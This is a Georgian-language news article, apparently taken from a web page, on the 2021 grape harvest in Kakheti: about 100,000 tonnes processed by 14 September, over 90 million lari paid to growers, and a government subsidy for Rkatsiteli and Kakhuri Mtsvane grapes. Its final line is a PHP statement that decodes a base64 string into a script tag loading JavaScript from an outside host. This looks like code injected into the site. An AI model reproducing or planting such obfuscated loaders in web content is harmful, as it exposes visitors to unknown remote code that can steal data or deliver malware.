celsiusi
ავერსი შნაიდერი
14 სექტემბრის მონაცემებით, კახეთში 100 ათას ტონამდე ყურძენია გადამუშავებული, რაც საპროგნოზო მაჩვენებლის დაახლოებით 40%-ია. 
 
როგორც Business Time-ს ღვინის ეროვნული სააგენტოდან აცნობეს, ყურძნის დღიური გადამუშავება 10 ათასი ტონის ფარგლებშია. რთველის პროცესში დღემდე 136 ღვინის საწარმო იყო ჩართული. კახეთში, მევენახეებმა,  ყურძნის რეალიზაციით  90 მლნ ლარზე მეტი შემოსავალი უკვე მიიღეს. მოსავლის რეალიზაცია 10 ათასამდე მევენახემ მოახდინა.
 
საქართველოს მთავრობის გადაწყვეტილებით, 2021 წლის რთველის მხარდასაჭერად, სუბსიდირების პროგრამა მოქმდებს. 
 
რთველი 2021-ის ფარგლებში, სუბსიდიას მიიღებს ყველა ის კომპანია, რომელიც შეიძენს და გადაამუშავებს კახეთის რეგიონში მოწეულ არანაკლებ 100 ტონა რქაწითელის ან კახური მწვანის ჯიშის ყურძენს და 1 კგ ყურძენში მევენახეს არანაკლებ 0,90 ლარს გადაუხდის.
1092
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");